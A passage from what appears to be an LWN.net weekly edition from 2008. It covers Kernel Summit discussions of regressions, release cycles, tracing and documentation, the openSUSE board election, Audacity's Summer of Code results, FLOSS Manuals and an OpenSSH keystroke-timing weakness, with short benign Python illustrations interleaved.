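    """Estimate the day on which the fitted fix line catches the fitted report curve.

    days must be positive (the report model is a + b * ln(day)).
    Returns None if the curves do not meet before the horizon.
    """
    a, b = fit_line([math.log(d) for d in days], reported)
    c, e = fit_line(days, fixed)

    def gap(t):
        # Fitted reports minus fitted fixes; positive while regressions remain open.
        return (a + b * math.log(t)) - (c + e * t)

    lo, hi = float(days[-1]), float(horizon)
    if gap(lo) <= 0:
        return lo           # fixes have already caught up within the observed data
    if gap(hi) > 0:
        return None         # no crossover before the horizon
    for _ in range(100):    # bisection: gap(lo) > 0 and gap(hi) <= 0 throughout
        mid = (lo + hi) / 2
        if gap(mid) > 0:
            lo = mid
        else:
            hi = mid
    return hi


# Made-up data: 30 days of cumulative reports and fixes.
days = list(range(1, 31))
reported = [10 + 20 * math.log(d) for d in days]
fixed = [1.0 * d for d in days]
estimate = crossover_day(days, reported, fixed)
```

With real data the fit would be far noisier than this synthetic example suggests, so any such estimate should be read as a rough guide rather than a release date.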


One problem raised by Rafael was that fixes for regressions take far too
long to get into the mainline.  Some subsystem maintainers like to let
regression fixes sit in the linux-next tree for a while.  It was pointed
out, though, that presence in linux-next did not help find the original
regression, so there is unlikely to be any value in letting fixes age
there; they should, instead, go straight into the mainline.


Rafael also noted that some regressions attract no debugging effort at all;
it seems that nobody is interested in working on them.  It can be
disheartening for users to hear nothing about a reported regression at all;
somebody should at least tell them why the problem is not being worked on.
He also noted that regressions which have been bisected (to identify the
change which first caused the problem to happen) tend to get fixed much
more quickly.  The data from the bisection is undoubtedly useful, but the
real benefit probably comes from fingering the guilty party, who then feels
the need to get a fix in place.
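Bisection itself is just a binary search over the commit history; git automates it with the "git bisect" command.  The sketch below shows the idea in isolation, under the assumptions that the commits are given oldest to newest, that the first is known to be good and the last known to be bad, and that once the problem appears it stays.  The function name and the is_bad callback are hypothetical.

```python
def first_bad_commit(commits, is_bad):
    """Return the first commit for which is_bad(commit) is true.

    Assumes commits[0] is good, commits[-1] is bad, and every commit
    after the first bad one is also bad.
    """
    lo, hi = 0, len(commits) - 1      # commits[lo] is good, commits[hi] is bad
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if is_bad(commits[mid]):      # in practice: build, boot, and test this commit
            hi = mid
        else:
            lo = mid
    return commits[hi]
```

Each test halves the remaining range, so even a range of a few thousand commits can be narrowed to a single change in a dozen or so build-and-boot cycles.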


Another thing Rafael pointed out is that we have a small core of dedicated
testers; most of our regressions are reported by a small, recurring group
of people.  Perhaps we could recruit some of those people to help with the
management of bugs.  They could track reports, get more information from
users, and harass maintainers to get fixes in place.  These people have
already shown a certain amount of dedication; giving them this kind of role
would let them expand the help they are able to give to the kernel
community. 

There was also some talk of trying to track the amount of test coverage the
kernel is receiving.  There could be some sort of mechanism set up, perhaps tied
into Fedora's "smolt" system, to report successful boots of the kernel on
specific hardware.  There are obvious privacy issues which would have to be
addressed, and the whole thing would take a certain amount of work.  It is
not clear that anybody feels this idea is important enough to put the
requisite amount of time into.

Release process

Matt Mackall asked a question: what would happen if we were to cut the
merge window down to one week - merging less code - and shorten the
development cycle to match?  With some discipline, maybe we could produce a
stable kernel release every six weeks.  Linus responded that he would love
to see this happen.  His main motivation was to reduce the size of the -rc1
releases, which have gotten quite big in recent development cycles.  A
smaller -rc1 would be easier to debug and should, hopefully, stabilize more
quickly.


Quite a bit of time went into discussing this idea.  The shorter merge
window was clearly worrisome to some developers who feel that the two-week
window is already painfully short.  Merging of trees with dependencies on
other trees would get harder.  It would also be harder to get good testing
coverage, since there would be less time for testers to play with each
release.  Some code simply takes a long time to fix; it's not clear that
this stabilization could be compressed into the shorter cycle.  There would
have to be some higher barriers to ensure that code which does get in
through a particular merge window is truly ready.


Andrew Morton jumped in with a complaint about code that shows up in the
mainline, but which has never made an appearance in linux-next or the -mm
tree.  He acknowledged that this would always happen, but asserted that it
should be an extraordinary event.  The guilty subsystem maintainer, he
says, should at least make excuses for doing this.  Much of the problem, it
was said, comes from vendors who show up with last-minute patches that they
want to see merged.  The answer was to tell them that it is too late, that
the merge window is for subsystem maintainers, not for vendors.

Getting back to the shorter cycle, Linus pointed out that it would require
a great deal of care from everybody involved, especially the first time
around.  It would require a development cycle which does not start with a
lot of pending code - a problem, since there is always a big pile of
patches waiting by the time the merge window opens.

Al Viro suggested only merging a subset of subsystem trees in any
development cycle, only accepting trivial patches from the rest.  James
Bottomley responded that, if his trees lost out in a given development
cycle, his definition of "trivial" would surely change.  Another suggestion
was to simply merge linux-next, but Linus did not like that.  He goes out
of his way to limit the amount of code he merges each day as a favor to the
people who test the nightly repository snapshots.  Pulling in all of
linux-next would make that impossible.
Yet another option is to only pull trees for which the pull request is in
place before the merge window opens.  This idea seemed popular for a while.

Just about when it looked like a consensus for trying the idea was settling
into place, Matthew Wilcox stated that he didn't like it.  His work
involves tracking down performance issues, a process which can take quite a
bit of time.  A shortened development cycle would not allow the time needed
to get that work done.  Andrew Morton said that he saw no real point in the
change; it wasn't addressing any of our biggest problems, and we would lose
economies of scale in testing large numbers of changes.  Dave Airlie said
it would require testers to do twice as much work, dealing with -rc1
kernels twice as often.  Ben Herrenschmidt worried that the tighter
deadlines would make developers rush, leading to lower-quality code.  And
Dave Jones said that changing the cycle would make future kernel releases
less predictable, making communications with vendors and customers harder.

These comments essentially ended the discussion of the shorter development
cycle idea.  In the end, concluded Linus, it was better not to mess with
something which isn't completely broken.  So nothing may have come of it,
but it was an interesting exploration of how things could be done
differently.

		KS2008: Tracing


Tracing is a hot issue in the Linux community, mostly as the result of the
actions of an allegedly friendly company: Sun Microsystems has been putting
a lot of marketing energy into telling customers that DTrace makes Solaris
a better system.  The fact of the matter is that Linux does not lack
tracing tools, but it does seem to lack tools which are usable to
the wider community.  The second day of the 2008 kernel summit started with
a pair of sessions dedicated to determining where the gaps are and trying
to figure out what to do about them.

James Bottomley started with a description of his experiences with
SystemTap, the utility which is most often cited as our answer to DTrace.
He had a lot of trouble getting it to work with his system.  In his mind,
the root cause for all this trouble is the simple fact that nobody from the
development community is actually using SystemTap.  A quick query of the
room suggested that about half of the developers present had tried using
SystemTap at one point or other; maybe 20% actually succeeded.  So there is
a roadblock of sorts here; SystemTap needs attention from kernel developers
to progress, but those developers find it unsuited to their needs and
difficult to use, so they tend to ignore it.


But kernel developers are not the targeted user base for a tool like
SystemTap; it is aimed at end users and deployed systems.  To help clarify
what those users need, Vinod Kutty from the Chicago Mercantile Exchange
took some time to talk about his needs for tracing tools.  In general,
these users need a higher level of visibility into running, production
systems.  They need to be able to track down slowdowns, look at the
environment in which processes are running, and, in general, to be able to
look in corners of the system which nobody will have anticipated in
advance.  All of this has to happen while the system is running in
production; it is, he says, somewhat like needing to look under the hood of
a car while driving at 100mph.


Also useful is the ability to run tracing tools in a "flight recorder"
mode, where an administrator can look at historical data after something
goes wrong.  And it is necessary to be able to look at user-space events as
well as those from the kernel.  Events generated in user space are often
more meaningful to the people running the system.  All of this is needed to
be able to communicate with distributors about where the problems come up,
so that the distributor can work toward a fix.  Current tracing tools for
Linux are insufficient.
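The "flight recorder" idea can be illustrated with a fixed-size ring buffer: events are recorded continuously, old ones are silently overwritten, and the surviving history is only examined after something goes wrong.  This is a conceptual sketch, not a description of how any of the tools discussed here implement it; the class and method names are invented.

```python
from collections import deque


class FlightRecorder:
    """Keep only the most recent `capacity` events."""

    def __init__(self, capacity):
        # A deque with maxlen drops the oldest entry when a new one is appended.
        self._events = deque(maxlen=capacity)

    def record(self, timestamp, message):
        self._events.append((timestamp, message))

    def dump(self):
        """Return the retained events, oldest first."""
        return list(self._events)
```

The appeal for production systems is that memory use is bounded no matter how long tracing stays enabled.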


Linus asked: is tracing needed primarily to track down bugs or to find
performance issues?  It turns out that performance problems are the big
issue.  James asked what parameters were the most important; the answer
mentioned individual process I/O events, user-space events, and the ability
to map user events to kernel-level events.


Moving on, Vinod also noted that low impact is important; the tracing tool
cannot place a heavy load on the system.  These tools need to start
quickly.  Current tools are far too big.  There is also a need for good
filtering; tracing tools can generate a lot of data.  Administrators
and developers need a way to boil down all that data to an amount they can
deal with.  Even better are tools which can spot problems in the trace
stream and raise red flags when they happen.


And, of course, tracing tools really cannot crash the system while they are
running.  SystemTap still falls a little short in this area; it's not hard
to bring down a system while trying to trace it.  Adding a DTrace-style
virtual machine was discussed; in theory, a VM can make the tracing tool
demonstrably safer.  Vinod responded that it could be useful, but the proof
of maturity is in watching the software run for a while.


This is where Linus came in to proclaim that he hates every tracing tool he
has seen.  SystemTap is far too complicated; these tools need to be
simpler.  Adding a virtual machine to SystemTap would just make things more
complicated; that's not the way to fix its problems.  According to Linus,
most of the problems solved by tracing come down to figuring out scheduling
issues, and we have the tools to do that now.  We should be making better
use of the simple tools which are currently in the kernel before trying to
put more complicated 
stuff in.  We should, for example, make latencytop work better
and push to get it into the enterprise distributions.  This "use the tools
we already have" suggestion came back many times during the session.


Christoph Hellwig brought up another recurring theme: while dynamic tracing
is nice, there is a lot of value to be had from well-placed static trace
points which are managed by the maintainer of the code.  Matthew Wilcox
added that the user-space trace points (for DTrace) added to PostgreSQL have
proved to be highly useful for database administrators; people running
PostgreSQL now have a strong motivation to do so on Solaris systems.  We
would do well to match that functionality on Linux.


A key component of SystemTap is the collection of "tapsets," scripts which
allow a user to look into the kernel for specific information.  These
tapsets are a problem, though; they are tightly tied to a specific kernel,
but the kernel is constantly being changed.  So tapsets go stale quickly.
Moving these tapsets into the kernel might help, but they will still be a
separate body of code which is prone to breaking.  Static trace points,
which can be maintained directly with the code they monitor, are much more
likely to continue to work in the long term.

Martin Bligh noted that Google maintains a set of 20-30 static trace points
for use with the LTTng trace tool.  This very small set of trace
points is sufficient to solve most problems that Google encounters.  Martin
will, hopefully, be posting those trace points for inclusion into the
mainline, though Google's associated tools might not be available.

Vinod finished this portion of the session by stating that he likes the
tapset concept.  It allows him (or somebody in his group) to write a script
aimed at a specific situation, and others can make use of it immediately.
There's no need to wait for the release of a more specialized tool.

Trace toolkits

Mathieu Desnoyers spent a few moments introducing the LTTng tracing package.  LTTng is a static
tracing tool, depending on markers placed in the kernel itself.  It has
been designed for high performance and simplicity; that, in turn, should
help to make it safe to use on production systems.  All LTTng trace points
have to be in the kernel code itself and be maintained by the appropriate
subsystem maintainers.

The core kernel code includes a module for precise time stamping (needed to
preserve the ordering of events which go through different per-CPU relay
buffers), the relaying code, and a netlink-driven module to control
tracing.  There is a user-space library and, of course, a set of analysis
tools.  LTTng can support "flight recorder" mode which can initiate tracing
when a specific trigger situation comes about.  There is also a mechanism
for putting markers into user space.
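The reason precise time stamps matter can be seen in a small sketch: each CPU's buffer is ordered internally, but a global view of events requires merging the buffers by timestamp.  The code below assumes each buffer is a list of (timestamp, event) pairs already sorted by timestamp; the data layout and names are invented for illustration and are not LTTng's actual format.

```python
import heapq


def _tagged(cpu, events):
    """Yield (timestamp, cpu, event) for one CPU's buffer."""
    for timestamp, event in events:
        yield timestamp, cpu, event


def merge_per_cpu(buffers):
    """Merge per-CPU buffers into one list ordered by timestamp.

    buffers maps a CPU number to a list of (timestamp, event) pairs,
    each list already sorted by timestamp.  Ties are broken by CPU number.
    """
    streams = [_tagged(cpu, events) for cpu, events in buffers.items()]
    return list(heapq.merge(*streams, key=lambda item: item[:2]))
```

If the clocks on different CPUs disagree, a merge like this will quietly put events in the wrong order, which is why the time stamping has to be done carefully.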

Frank Eigler spent some time talking about SystemTap; he used much of that
time to 
defend the design decisions which had been made.  When the SystemTap
project started, the kernel had almost no tracing features at all, so
they had to pick a path that worked.  Since there is a lot of hostility to
putting a virtual machine into the kernel, they had to go with code
generation instead.  They used kprobes because that was the mechanism that
was available.  And so on.  In general, SystemTap has a lot of the same
objectives as LTTng, plus, of course, the dynamic tracing feature.  There
are "some demos" showing working user-space tracing.

James stated that there was a real need for the users of these tools -
kernel developers, in this case - to provide input into how they work.
Frank responded that the SystemTap team has been crying out for people to
help.  It's clear, though, that this particular user base is not
sufficiently engaged in the development process.  It was said that the real
users of SystemTap are Red Hat consultants, who find that it works well
with the standard RHEL kernel.  But people trying to use SystemTap with a
current mainline kernel have to download "a shaky weekly tarball" to try to
make it work.  Until SystemTap is easier to use with the mainline kernel,
it will be a hard sell in the development community.

The problem there, of course, is that keeping SystemTap current while it is
out of the mainline tree is always going to be a struggle.  Resolving that
problem will require getting more of that code merged.  It seems that the
core SystemTap code is about 15,000 lines - small, according to Frank.
This could maybe go in, but Linus is resistant, saying that we need to get
the current, simple, in-kernel tracing tools into a usable state before we
try to add more of them.

Ted Ts'o remarked that there is a real difference with SystemTap: it is the
only Linux-based tracing package which, like DTrace, allows users to run code at the
trace points.  Thus it is able to do more complicated triggering,
filtering, and analysis.  Thomas Gleixner responded that this is all good,
but what is really needed is a simple trace package which does not require
the installation of a whole set of new tools.  He does tracing (using
ftrace) on a number of platforms, including embedded systems, and he isn't
willing to deal with the hassle involved in adding another complicated set
of software.

After that the conversation wandered into various, relatively obscure
technical topics like the details of how buffering mechanisms should work,
who should really be managing trace points, who manages instrumentation as
a whole, and so on. But there was a general sense that the summit wasn't
the venue for that kind of low-level detail, which isn't where the real
problems are anyway.  The tracing topic will be revisited at the Linux
Plumbers Conference, so it was decided to defer much of the discussion of
the details until then.

		The openSUSE Project's first board elections


The openSUSE Project is about to hold its first board election.
The process is well underway, with the first phase nearly over.  All members of the openSUSE project
may vote and can run for the board positions, but there is a
fast-approaching deadline by which to register
for this vote or to declare your intention to run for this election.  The
last call for candidates, received a
bit too late for last week's LWN issue, states that the application
deadline is September 24th, 12:00 UTC.

An election
committee has been formed to oversee the elections.  Four people, two
from Novell and two from the community, will organize and oversee the
election.  Committee members Claes Backstrom, Andrew Wafaa, Marko Jung, and
Vincent Untz have agreed not to run for this election so that they might
remain impartial.

The initial openSUSE board was
appointed by Novell.  Pascal Bleser, a member of that board, has written a
blog post about the openSUSE Board and the elections giving his view of
what the board does and does not do.  "One point that really must
be clarified (again) is that the Board is not responsible for taking
technical decisions. That's other people's job, e.g. AJ as the director of
openSUSE and platform, Coolo as the openSUSE distribution project manager,
or Michl as the openSUSE product manager."  Pascal also has a followup
post answering some additional questions about the time commitments and
involvement expected of a board member.

Andreas Jaeger, another member of the current board, has also written
about the board, how it's organized and what upcoming board members
might expect.  "I'm part of the first openSUSE board and in my
opinion we're still bootstrapping it and forming it.  Federico mentioned
that it took the GNOME board several years until they were really
functional - so this shaping of the board is not only in the openSUSE
project an evolutionary process that takes time and is influenced by
e.g. (constructive) criticism, praise, communication in general, and
decisions."  New board members will be able to shape the board from
the inside.  With a new board, community members can also help shape the
board by asking questions, commenting, and making their expectations known.

The board will consist of five members: a Novell-appointed chairperson, two
Novell employees and two community members (not employed by Novell).  So
far there are three Novell candidates and five non-Novell candidates.  The
list of candidates with pointers to their platforms can be found here.

We will soon be into the campaign period, which runs from September 25th to
October 9th.  During this time period there will be blog entries
from the candidates, interviews by the openSUSE news team, and a
moderated Q&A session on IRC.  There is also a feature in the
openSUSE election in which each eligible voter may appoint a second
openSUSE member to be eligible to vote.  The option to appoint a second
voter will be available during the campaign period and may allow a few
people who missed the September 24th deadline to vote.

The actual election begins as the campaign period ends.  Each eligible
voter will be able to cast their votes once.  No changes will be allowed.
Votes will be stored anonymously in the electronic system.  Ballots will be
closed October 23rd; the winners will be announced once the election
committee has had a chance to verify and count the votes.

If you care about the openSUSE project, this is a great time to get
involved.  Run for the board, vote in the election, and have a say in the
shape of things to come.

		Audacity gets new functionality via Google Summer of Code


Audacity is a popular and award-winning multi-track open-source and
cross-platform audio editor project that is built on the wxWidgets GUI
library.  LWN looked at Audacity in 2006.  The Audacity project announced
its participation in the 2008 Google Summer of Code student code writing
event on April 21, 2008.  GSoC 2008 is wrapping up and the
Audacity site notes the progress made this summer:


Four students participating with Audacity in Google Summer of Code successfully completed their projects, and their code will be in future versions of Audacity. The four projects were:
FFmpeg support, to greatly increase the range of file formats that can be imported and exported.
New GUI classes for future use in displaying audio tracks.
On-demand/level-of-detail file loading, for near-instant loading and editing of uncompressed files.
Sticky labels that stay with the audio through cut and paste.


The Audacity GSoC projects page details the goals and achievements made by
the students; we'll examine the results.


Руслан Ижбулатов
worked on adding FFmpeg support to Audacity in order to allow
importing and exporting of a wider variety of audio file types.
From the FFmpeg site:
"FFmpeg is a complete solution to record, convert and stream audio and video. It includes libavcodec, the leading audio/video codec library. FFmpeg is developed under Linux, but it can compiled under most operating systems, including Windows."
Audacity natively supports the WAV, AIFF, MP3, Ogg Vorbis, and FLAC
formats; the FFmpeg library supports those and adds support for the
GSM WAV, MP2, M4A (AAC), AMR, WMA, and many more formats.
The Project Progress page has details on how to access this
new functionality.
The page also includes the full list of FFmpeg supported formats.
The FFmpeg library can be linked and loaded dynamically at run time;
this allows it to be distributed as a separate package and
removes any CODEC licensing issues from Audacity.


Johannes Kulick added two new wxWidgets GUI classes and used
those in Audacity to improve the display of audio tracks.
His
project abstract states:
"Audacitys main user interface is the track panel. Its GUI architecture is written from scratch by the audacity team and as the team noticed the TrackPanel.cpp is a horrendous mess which is neither easy to maintain nor to extend.
There are the wxWidgets classes wxGridSizer and wxFlexGridSizer which fit well in the requirements of the track panel. They arrange its content in a table. While in wxGridSizer all rows have the same height and all columns have the same width, in wxFlexGridSizer classes each row can have its own height and each column can have its own width. This is the way the Track panel is arranged, too, but there is one more thing which is important: the ability to drag and drop each track and drag the height of each track as well. And here is the big disadvantage of the wxWidgets classes: they lack the ability of being dragable. If there were classes which have these ability this would be a big step to get a cleaner track panel architecture for Audacity.
So the project idea is that I will implement two classes wxDragGridSizer and wxDragFlexGridSizer which have the ability to do exactly these things."
The Project Progress tracks the steps that were done to achieve
the end results and the additional report covers extra work that was done
to extend support for the wxAUI (Advanced User Interface)
toolbar and window docking library.


Michael Chinen's project involved on-demand/level-of-detail file loading
for near-instant loading and editing of uncompressed files.  The
Project Progress explains:
"The QuickLoad project added near-instant loading of PCM uncompressed files without waiting for waveform calculation to complete. Playing and editing is now possible on demand at any point in the track while the waveform image is still being calculated in the background."  The Description section further clarifies the new capability:
"Previously, it might be necessary to wait several minutes for the file to load and be useable while the waveform computation was completed.
The waveform image will draw itself automatically during computation, but users can move the point in the file from which computation takes place, thus allowing them to view and edit any point in the file instantly. "
This project also allowed for further improvements to Audacity:
"One of the reasons the Quickload project was approved was because the OD framework will provide a method in which other tasks, such as loading non-wav formats, processing effects, and exporting, can be made multithreaded. The current implementation of the OD framework is written generally so that this is possible, which means that future implementations of OD tasks will be done writing a minimum of code. Taking advantage of polymorphism, this kind of thing should get easier and easier as more tasks are made to support OD."


Mark Deutsch worked on adding
sticky labels that stay with the audio through cut and paste
operations.  The
Project Progress
explains:
"Label Track Enhancements removed a long-standing limitation that Audacity's labels did not stick to the audio track and move and edit with them."
Further:
"The biggest single addition from this project was the concept of linking tracks. Two or more linked tracks form a group. When an action is performed in one track, the other tracks in the group mirror that action. For example, if a group consists of one audio track and one label track, deleting part of the audio track will also delete that part of the label track.
This linking is done implicitly, and depends on the layout of the tracks. A group is defined as a set of contiguous audio tracks followed by a contiguous set of label tracks."
The sticky labels addition also improves the way Audacity
handles insertions and other operations:
"This functionality doesn't only handle deletes, though. Inserting audio, whether through pasting or using the "Generate" functions also shifts the grouped tracks correspondingly. The "Change" functions (Change Speed/Tempo/Pitch) are also supported. Slowing down a track will insert silence into linked tracks to keep all the tracks sync'd. Similarly, speeding up a track inserts silence into that track to achieve the same result."

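The implicit grouping rule quoted above (a run of contiguous audio tracks followed by a run of contiguous label tracks) can be sketched as a single pass over the track list.  This is an illustration of the rule as described, not Audacity's code; the function name and the "audio"/"label" strings are invented, and the handling of label tracks with no audio above them, or audio tracks with no labels below, is an assumption.

```python
def group_tracks(kinds):
    """Split tracks into linked groups.

    kinds is a list of "audio" or "label" strings in display order.
    Returns a list of groups, each a list of track indices.  A new group
    starts whenever an audio track follows a label track.
    """
    groups = []
    current = []
    for index, kind in enumerate(kinds):
        starts_new_group = (
            kind == "audio" and current and kinds[current[-1]] == "label"
        )
        if starts_new_group:
            groups.append(current)
            current = []
        current.append(index)
    if current:
        groups.append(current)
    return groups
```

An edit applied to one track would then be mirrored on every other track whose index appears in the same group.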

Lars Luthman was unable to finish the fifth project,
Support for the LV2 plugin architecture,
but he did organize the problem space and produce some code that
should be useful for future work.
The Project Progress report shows what was accomplished, and the
main Audacity projects document explains how it ended:
"The project which did not pass still had plenty of good coding work and skill behind it, indeed believed to be fully working on the linux platform. It was communication, possibly to modify the goals shortly after mid term, that really let it down."


The 2008 GSoC projects added a number of useful new capabilities
to Audacity.  The wxWidgets project also benefited from the work
with some enhancements that can be used by other projects.
Once again, GSoC proves itself as a program that can focus
in on areas of open-source applications that need improvements,
and produce useful results in a short time span.
GSoC is successful in bringing the guidance of experienced mentors
together with the coding muscle of inspired students.


		User manuals for free software


Documentation for free software is generally a problem area, both for users
and developers.  But developers at least have the code to consult, whereas
most users are left poking around through menu items and consulting multiple
web pages.  The FLOSS Manuals
project is using techniques similar to those used in free software
development to produce manuals for users. 


The project seeks to create the kind of manuals that users may be used to
from proprietary software packages.  The project's About page describes the
manuals being produced:

FLOSS Manuals make free software more accessible by providing clear
documentation that accurately explains their purpose and use. Each manual
explains what the software does and what it doesn't do, what the interface
looks like, how to install it, how to set the most basic configuration
necessary, and how to use its main functions. To ensure the information
remains useful and up to date the manuals are regularly developed to add
more advanced uses, and to document changes and new versions of the
software.


There is a wide variety of
manuals in progress, covering graphics and audio tools, OpenOffice,
Firefox, WordPress for blogging, and more.  The most recent addition is a
set of eight manuals for the One Laptop Per Child XO.  These were created
as part of an XO/Sugar
book sprint held in August in Austin, Texas.  The manuals cover the XO
hardware and Sugar interface as well as six different activities that are
available 
as part of Sugar.


The use of a "sprint" is just part of the adoption of free software
development strategies.  The project is set up to allow for collaborative
development by a community.  FLOSS Manuals describes it this way:

The manuals on FLOSS Manuals are written by a community of people, who do a
variety of things to keep the manuals as up to date and accurate as
possible. Anyone can contribute to a manual – to fix a spelling
mistake, to 
add a more detailed explanation, to write a new chapter, or to start a
whole new manual. The way in which FLOSS Manuals are written mirrors the
way in which FLOSS (Free, libre open source) software itself is written: by
a community who contribute to and maintain the content. 


The manuals themselves are available in a variety of formats: HTML, PDF, as
well as dead tree.  One of the more interesting features is the remix capability.  Using an
AJAX interface, one can pick and choose from the 
chapters of existing manuals to create a custom manual that includes only
the pieces required for some group of users.  Remixers can choose their own
cover and title, then export it all as a PDF file.  Alternatively, one can
cut and paste
some JavaScript code into a web page to create a reader application on
the page.  In this way, the custom manual will always be up-to-date with the
latest changes made to the chapters. 


FLOSS Manuals clearly fills a real need in the free software
world.  The manuals have a rather
professional
look that will immediately stand out to users.  There is a lot of work
to be done, but it would appear that the project has made an excellent
start.  As one might guess, it is always looking for more interested folks
to write, edit, and proofread manuals.


(Thanks to LWN reader David Farning for suggesting we look at this project.)

		KS2008: Documentation


Your editor got talked into kicking off the kernel summit discussion on
documentation; if this coverage is sketchier than usual, it's because it's
hard to try to lead a discussion and take notes at the same time.  After
some of the obligatory introductory notes on how documentation is always a
problem, it was asked: how many kernel developers had actually gotten
something useful from the in-tree documentation directory recently?  Almost
all attendees raised their hands.  There is value, it seems, in the
documentation which is available now.

That said, there are also traps.  An aspiring camera driver author would,
upon exploring the documentation directory, stumble across a detailed file
describing just how those drivers should be written.  The author is Alan
Cox, who might be considered to be a reasonably authoritative source.  But
this document describes the deprecated Video4Linux1 API; if our author
wrote a new driver to that API, he or she would probably feel a little
misled once the initial reviews came back.  The value of that document in
2008 is probably negative.

There are plenty of equally musty documents in the kernel documentation tree.  The
real problem is that documentation has no subsystem maintainer, nobody who
will clean out the old stuff.  The legendary lack of organization in that
directory is also a result of a lack of overall maintenance.

The question that was put to the developers was: what do you want from
kernel documentation?  
Linus had a clear answer; what he wants is better release
notes for each kernel version.  It's not clear how to get there; maybe some
sort of automated way of finding descriptions of new features in the git
changelogs.  What's even less clear is how this work could improve on the
high-quality work done
over at the kernelnewbies.org site.

Matthew Wilcox asked for some quality control on documentation
submissions.  He noted, in particular, that the coding style document would
appear to have drifted from its original intent over the years.

One useful form of documentation that developers would like to see more of
is test programs for new features.  Test code for new system calls is
especially useful; it describes how the system call should work, and allows
architecture maintainers to verify that they have connected things up
properly.

There were questions on how much of the supplied kernel documentation is
truly useful; maybe much of it should be removed?  There are some obviously
useful files, like those describing kernel boot and tuning parameters.  The
KernelDoc documents have their value; much of that documentation appears in
the code itself, and the KernelDoc code checks to make sure that the
documentation matches the associated function definitions.  Much of the
rest tends to be out of date and unused.  
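
The kind of consistency check described here can be illustrated with a small Python sketch.  It is not the kernel's own KernelDoc tooling; the function names, the sample comment, and the prototype below are all invented for illustration, and the parsing only copes with simple prototypes.

```python
import re

def documented_params(comment):
    """Collect the names introduced by '@name:' lines in a kernel-doc style comment."""
    return re.findall(r"^\s*\*\s*@(\w+):", comment, flags=re.MULTILINE)

def declared_params(prototype):
    """Pull parameter names out of a simple C prototype (no function pointers)."""
    args = prototype[prototype.index("(") + 1 : prototype.rindex(")")]
    names = []
    for arg in args.split(","):
        arg = arg.strip()
        match = re.search(r"(\w+)\s*$", arg)
        if match and arg != "void":
            names.append(match.group(1))
    return names

# Hypothetical documentation comment and prototype that have drifted apart.
comment = """/**
 * frob_widget - frobnicate a widget
 * @widget: the widget to operate on
 * @flags: behavior flags
 */"""
prototype = "int frob_widget(struct widget *widget, unsigned int mode)"

# Parameters in the code but not the comment, and vice versa.
missing = sorted(set(declared_params(prototype)) - set(documented_params(comment)))
stale = sorted(set(documented_params(comment)) - set(declared_params(prototype)))
```

Here `missing` names the parameter the comment forgot and `stale` names the one that no longer exists; a check of this sort is what keeps in-code documentation from rotting the way free-standing files do.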

One result of the discussion might be an effort to remove some of the
oldest, most fictional documentation.  Beyond that, though, it looks mostly
like business as usual.

		OpenSSH and keystroke timings


Theoretical security weaknesses have a tendency to move from the realm of
theory to that of practice over time.  Sometimes it is the result of more
compute power being applied or better algorithms being developed, but a
weakness is certainly not going to get stronger.  So when Kevin Neff
started discussing fixing a weakness in
OpenSSH on the openbsd-misc mailing list, the folks writing it off as
"theoretical" may have been 
jumping the gun. 


When it is in interactive mode—a user typing into a terminal session
for example—ssh sends each key pressed by the user in a
separate packet.  By observing the timing between packets, an observer may
be able to determine something about what was typed just by using traffic
analysis, without 
attempting to break the encryption.  Researchers found that the
inter-packet timing correlated well with the inter-keystroke timing, so
that using 
statistical techniques they were able to reduce the search space for
cracking a password by a factor of 50.
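
The measurement side of such an attack is easy to picture.  The Python sketch below assumes an observer has already recorded packet arrival times (the timestamps are invented for illustration) and derives the gaps that any statistical analysis would work from; it also expresses the factor-of-50 reduction in bits.  It is not the researchers' code, and the function name is hypothetical.

```python
import math

def inter_arrival_times(timestamps):
    """Return the gaps, in seconds, between consecutive packet arrivals."""
    return [later - earlier for earlier, later in zip(timestamps, timestamps[1:])]

# Hypothetical arrival times (seconds) of five single-keystroke packets.
packet_times = [0.00, 0.12, 0.31, 0.36, 0.60]
gaps = inter_arrival_times(packet_times)

# A 50-fold smaller search space corresponds to log2(50) bits of information.
bits_saved = math.log2(50)
```

No decryption is involved at any point; the observer needs only packet timestamps.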


This weakness was outlined in a 2001 paper entitled "Timing analysis
of keystrokes and timing attacks on SSH" [PDF] which looked
specifically at the timing-based attack:   

In this paper we study users' keyboard dynamics and
show that the timing information of keystrokes does leak
information about the key sequences typed. Through
more detailed analysis we show that the timing information leaks about 1
bit of information about the content 
per keystroke pair. Because the entropy of passwords
is only 4-8 bits per character, this 1 bit per keystroke
pair information can reveal significant information about
the content typed.


The paper looked at the now-deprecated SSH1 protocol, which led some to
conclude that the weakness is largely irrelevant today. Damien Miller pointed
out that it was likely to still be valid:

There is no reason to believe that keystroke timing attacks will be
impossible against protocol 2 where they work against protocol 1.
They might just be a little more tricky.

Pointing at the paper and discounting it because it is ssh1 only is
sticking your head in the sand. It is usually easier to research attacks
on simpler protocols and work up to more complicated ones later.


There is a fair amount of information that can be gleaned just by looking
at the traffic generated over an encrypted session, especially if the
attacker can gather a sizable amount of it.  There are fairly clear
patterns in interactive sessions that can be extracted and used
alongside the inter-keystroke timing information to potentially garner lots
of useful information.  Darrin Chandler describes it this way:

The reason why I think it's a weakness is that you can gather statistics
on typing and use those to infer things. I.e., you can extract
meaningful information from the encrypted session. If you're snooping on
ssh and see a short burst of typing followed by another ssh session from
the remote machine you can guess they typed 'ssh host.example.com' by
the length of typing and the host connected to. Nice crib. Oh, after
than connect was there another short burst? Probably the password. How
many keystrokes can probably be inferred. Perhaps stats on interkey
timing can be used to make some intelligent guesses, such as the 4th
char is NOT punctuation because is followed char 3 too closely. Or
whatever.


Overall, the reception to making OpenSSH less susceptible to this kind of
analysis was positive.  It is clearly a difficult attack to mount,
logistically if nothing else, but it is not impossible either.  Better
timing information or analysis techniques might make it easier over time as
well, and that is reason enough to look at ways to fix it.


		KS2008: more minisummit reports


The kernel summit dedicated a slot on its second-day agenda to the
presentation of more minisummit reports and lightning talks.  First up was
Chris Wright, who reported from the virtualization minisummit held last
April in Austin.  The developers at the minisummit learned a lot about the
hardware roadmaps maintained by various vendors.  There was talk of
improving cooperation with QEMU.  The possibility of VMware open-sourcing
its user-space tools was raised, though, it seems, there is no prospect of
getting that company's drivers released.  The problem with the drivers is
not legal; it's just that they are so tightly integrated with the VMware
hypervisor that there is little point in putting them out there.

Beyond that, there were a number of discussions on topics (like
checkpoint/resume) which have since turned into code.  And it was noted
that the virtualization developers would like improved hugetlb support.
In particular, they like the active defragmentation patches which make it
more likely that huge page allocations will succeed.

David Miller discussed the 2008 networking minisummit, otherwise known as a
couple of developers wandering by his house to discuss ideas.  He mainly
talked about the multi-queue
work, which has been covered on LWN separately.  One interesting point
